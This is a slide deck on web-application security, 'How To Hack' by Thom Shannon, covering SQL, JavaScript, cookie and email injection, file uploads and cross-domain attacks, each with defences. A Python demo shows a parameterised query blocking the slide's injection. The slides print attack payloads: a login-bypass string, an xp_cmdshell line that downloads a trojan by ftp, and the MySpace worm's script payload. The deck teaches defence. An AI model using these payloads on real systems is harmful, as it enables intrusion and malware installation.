How To Hack

Or how not to get hacked! The common ways that web applications can be attacked and what you need to do to prevent it.

  1. Thom Shannon – Glow New Media
  2. 7 SINS OF A COMPLACENT WEB DEVELOPER
     • SQL Injection
     • JavaScript Injection
     • Cookie Injection
     • Email Injection
     • File Uploads
     • Cross domain form submission
     • Cross domain JSON APIs
  4. SELECT * FROM [User] WHERE
     [Name] = 'admin'
     AND
     [Password] = 'secret'
  5. SELECT * FROM [User] WHERE
     [Name] = 'admin'
     AND
     [Password] = '' or true; -- '
  7. SELECT * FROM [Page] WHERE
     [Title] = 'Home'; exec xp_cmdshell('ftp host trojan.exe')' -- '
  8. • Validate ALL possible inputs
     • Escape Quotes!
     • Use strongly typed/parameter queries
     • Can affect many platforms
       – ASP
       – .Net
       – PHP
       – ...
  10. MYSPACE WORM
     • <div id="mycode" expr="alert('pwnd!')" style="background:url('java script:eval(document.all.mycode.expr)')">
  13. DEFAULT DENY
     • Strip all HTML
     • Use a simple markup like Textile
     • Validate ALL inputs
  15. BAD COOKIES
     • loggedon=false
     • Userid=78
     • permissionlevel=1
  16. • Store important data on server
     • Use a token
     • Do not trust anything sent from the client
  18. • Used by Spammers
     • From: [email_address]
     • Cc: spamee@gmail.com, poorsap@hotmail.com
     • Subject: Buy [Drugs|Viagra|Stocks]
  19. • Validate email addresses and other content
     • Don't put user input in mail headers
  21. • /uploads/runSpamEngine.php
     • /uploads/downloadDb.aspx
     • /uploads/crashBox.exe
  22. • SysAdmin can remove execution permissions
     • Web Developer can validate too
     • Always use DEFAULT DENY (whitelist)
  24. • Post from attacker's site to logged in site
     • Action purchases
     • Change profile page
     • Use hidden frame to keep posting
  26. • Pass a token with the form
     • Confirm destructive actions
     • 307 redirect in Internet Explorer
  28. • AJAX friendly APIs
     • JavaScript blog widgets
     • Called using SCRIPT elements
     • Can cause actions or reveal private data
  29. • Client side code is always insecure
     • Authenticate with query string
     • Track using API application key
  30. In Summary
     • Don't pass the buck, take responsibility
     • Web app exploits are the most common
     • Everyone is a target
  31. • Thom Shannon
     • www.ts0.com
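Slides 4, 5 and 8 show the login query, the `' or true; --` input that rewrites it, and the parameterised-query fix. The following Python example is added here and is not part of the original deck: it runs both forms of the query against a constructed in-memory SQLite table (a `User` table with one `admin`/`secret` row, an assumption standing in for the slide's `[User]`) and shows that the slide's input logs in through the concatenated query but not through the parameterised one.

```python
import sqlite3

PAYLOAD = "' or true; -- "   # the password-field input from slide 5


def make_db():
    """Constructed in-memory stand-in for the [User] table on slide 4.
    Plaintext passwords are kept only to mirror the slide; real systems hash them."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE User (Name TEXT, Password TEXT)")
    conn.execute("INSERT INTO User VALUES ('admin', 'secret')")
    return conn


def login_concatenated(conn, name, password):
    """The query as the complacent developer builds it: user input is pasted
    between the quotes, so a quote in the input rewrites the WHERE clause.
    With PAYLOAD the SQL becomes ... Password = '' or true; -- ' and the
    comment marker discards the closing quote the code appended."""
    sql = ("SELECT * FROM User WHERE Name = '" + name + "'"
           " AND Password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn, name, password):
    """The fix from slide 8: placeholders keep the SQL text fixed and the
    driver binds the input as data, so quotes and comment markers in the
    input stay literal characters of the password being compared."""
    sql = "SELECT * FROM User WHERE Name = ? AND Password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


def compare(conn=None):
    """Returns (concatenated, parameterised) login outcomes for PAYLOAD."""
    conn = conn or make_db()
    return (login_concatenated(conn, "admin", PAYLOAD),
            login_parameterised(conn, "admin", PAYLOAD))


if __name__ == "__main__":
    bad, good = compare()
    print("concatenated query, payload as password -> logged in:", bad)    # True
    print("parameterised query, payload as password -> logged in:", good)  # False
```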
